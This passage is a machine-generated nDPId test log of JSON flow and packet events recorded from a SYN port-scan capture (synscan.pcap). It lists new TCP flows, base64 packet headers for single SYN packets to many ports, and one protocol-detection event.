-00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":800,"source":"synscan.pcap","alias":"nDPId-test","flow_id":791,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsWeIAACUGyZCsEAAIQA2GNIzTBDvdU4MZAAAAAGACCAAsUQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":32779,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":801,"source":"synscan.pcap","alias":"nDPId-test","flow_id":792,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAso64AADAGdMSsEAAIQA2GNIzSgAvdUoMYAAAAAGACBAC0gwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49156,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"synscan.pcap","alias":"nDPId-test","flow_id":793,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAss6AAADcGXdKsEAAIQA2GNIzSwATdUoMYAAAAAGACEABoigAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"synscan.pcap","alias":"nDPId-test","flow_id":794,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsJmIAACkG+RCsEAAIQA2GNIzSFYbdUoMYAAAAAGACCAAbCQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"synscan.pcap","alias":"nDPId-test","flow_id":795,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsVkIAACsGxzCsEAAIQA2GNIzSFb7dUoMYAAAAAGACEAAS0QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":805,"source":"synscan.pcap","alias":"nDPId-test","flow_id":796,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsE28AADgG\/QOsEAAIQA2GNIzSJw\/dUoMYAAAAAGACBAANgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9485,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":806,"source":"synscan.pcap","alias":"nDPId-test","flow_id":797,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs68EAAC8GLbGsEAAIQA2GNIzSJQ3dUoMYAAAAAGACEAADggAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3878,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":807,"source":"synscan.pcap","alias":"nDPId-test","flow_id":798,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAsD9gAADIGBpusEAAIQA2GNIzSDybdUoMYAAAAAGACDAAdaQAAAgQFtA=="} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059736,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059736,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":84,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":808,"source":"synscan.pcap","alias":"nDPId-test","flow_id":799,"flow_packet_id":1,"flow_last_seen":1278275059736,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059736,"pkt":"ACYLMQczACWzv5HuCABFAAAs9s8AADsGFqOsEAAIQA2GNIzSAFTdUoMYAAAAAGACEAAoOwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3801,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":809,"source":"synscan.pcap","alias":"nDPId-test","flow_id":800,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsPmoAADEG2QisEAAIQA2GNIzSDtndUoMYAAAAAGACCAAhtgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":17988,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":810,"source":"synscan.pcap","alias":"nDPId-test","flow_id":801,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsHzcAADAG+TusEAAIQA2GNIzSRkTdUoMYAAAAAGACBADuSgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49154,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"synscan.pcap","alias":"nDPId-test","flow_id":802,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsh2UAACoGlw2sEAAIQA2GNIzSwALdUoMYAAAAAGACDABsjAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":812,"source":"synscan.pcap","alias":"nDPId-test","flow_id":803,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsFxcAADoG91usEAAIQA2GNIzSJxrdUoMYAAAAAGACDAAFdQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":813,"source":"synscan.pcap","alias":"nDPId-test","flow_id":804,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsAXUAADoGDP6sEAAIQA2GNIzSFlbdUoMYAAAAAGACDAAWOQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3168,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":814,"source":"synscan.pcap","alias":"nDPId-test","flow_id":805,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsr+cAAC0Ga4usEAAIQA2GNIzSDGDdUoMYAAAAAGACCAAkLwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059737,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059737,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3006,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"synscan.pcap","alias":"nDPId-test","flow_id":806,"flow_packet_id":1,"flow_last_seen":1278275059737,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059737,"pkt":"ACYLMQczACWzv5HuCABFAAAsi1sAADkGhBesEAAIQA2GNIzSC77dUoMYAAAAAGACCAAk0QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1078,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"synscan.pcap","alias":"nDPId-test","flow_id":807,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs0uIAADYGP5CsEAAIQA2GNIzTBDbdU4MZAAAAAGACDAAoVgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":301,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":817,"source":"synscan.pcap","alias":"nDPId-test","flow_id":808,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsPTUAAC8G3D2sEAAIQA2GNIzTAS3dU4MZAAAAAGACEAAnXwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8181,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":818,"source":"synscan.pcap","alias":"nDPId-test","flow_id":809,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsv5EAACoGXuGsEAAIQA2GNIzTH\/XdU4MZAAAAAGACDAAMlwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsciYAADQGokysEAAIQA2GNIzTE4ndU4MZAAAAAGACBAAhAwAAAgQFtA=="} -00647{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":819,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1072,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":820,"source":"synscan.pcap","alias":"nDPId-test","flow_id":811,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs7U0AACoGMSWsEAAIQA2GNIzTBDDdU4MZAAAAAGACDAAoXAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9876,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":821,"source":"synscan.pcap","alias":"nDPId-test","flow_id":812,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsSkwAACkG1SasEAAIQA2GNIzTJpTdU4MZAAAAAGACCAAJ+AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6510,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":822,"source":"synscan.pcap","alias":"nDPId-test","flow_id":813,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAsBAUAAC4GFm6sEAAIQA2GNIzTGW7dU4MZAAAAAGACDAATHgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2022,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":823,"source":"synscan.pcap","alias":"nDPId-test","flow_id":814,"flow_packet_id":1,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059741,"pkt":"ACYLMQczACWzv5HuCABFAAAs3bMAADkGMb+sEAAIQA2GNIzTB+bdU4MZAAAAAGACCAAopgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":824,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059741,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 